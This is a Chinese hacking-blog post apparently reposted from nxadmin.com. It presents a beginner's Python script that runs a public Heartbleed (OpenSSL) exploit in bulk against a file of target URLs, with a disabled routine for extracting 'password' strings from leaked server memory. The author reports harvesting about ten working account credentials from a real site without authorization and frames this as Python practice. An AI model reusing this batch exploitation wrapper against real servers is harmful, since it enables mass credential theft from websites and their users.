记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

批量检测openssl(心脏出血)漏洞(新手学python)

2014-04-13 07:55

最近openssl(心脏滴血)漏洞挺火的,貌似这几天看到微博上有人说没多少危害之类的,不过根据亲测,发现危害还是比较大的。

所以找了个站,用for循环,批量抓了100个文件,大概10分钟左右完成,查找帐号和密码大概有10个左右,测试基本都是可以登录的,如果是访问量大的网站,可能段时间内能抓到更多!自己利用现有EXP写了个方便批量检测该漏洞的,主要是练手python,感觉不练进步太慢。贴上代码:

#coding:utf-8
import subprocess
import time

#遍历目标文件中的URL
def readtar(targetpath):
    f=open(targetpath,"r")
    for url in f.readlines():
        url=url.strip("\r\n")
        exploit(url)

#Exp执行,获取执行后的原始回显,发送给getres进行处理
def exploit(url):
    cmd="python "+r"e:\0day\openssl\ssltest.py "+url
    print cmd
    expover=subprocess.Popen(cmd,stdout=subprocess.PIPE)
    time.sleep(5)
    expres=expover.stdout.read()
    print expres
'''
#EXP执行回显筛选,获取有password的字符串
def getres(expres):
    ispwd=False
    if expres.find("password")>0:
        ispwd=True
    if ispwd==True:
        keywords="password"
        before=expres[expres.index(keywords)-280:expres.index(keywords)]
        after=expres[expres.index(keywords)+len(keywords):expres.index(keywords)+len(keywords)+140]
        passallstr=before+keywords+after
        print passallstr
        if len(passallstr)==0:
            print "Maybe no pass or user in strings"
'''
if __name__=='__main__':
    #注明测试目标所在文件
    targetfile=r"e:\0day\url.txt"
    readtar(targetfile)

主要还是借助公布的exp,只是增加了很简单的文件读取遍历挨个测试的代码,还想只打印出出现”password”关键字的前后几行,最后貌似还有点问题,所以注释掉了。

知识来源: www.nxadmin.com/web/1254.html
想收藏或者和大家分享这篇好文章→复制链接地址

“批量检测openssl(心脏出血)漏洞(新手学python)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云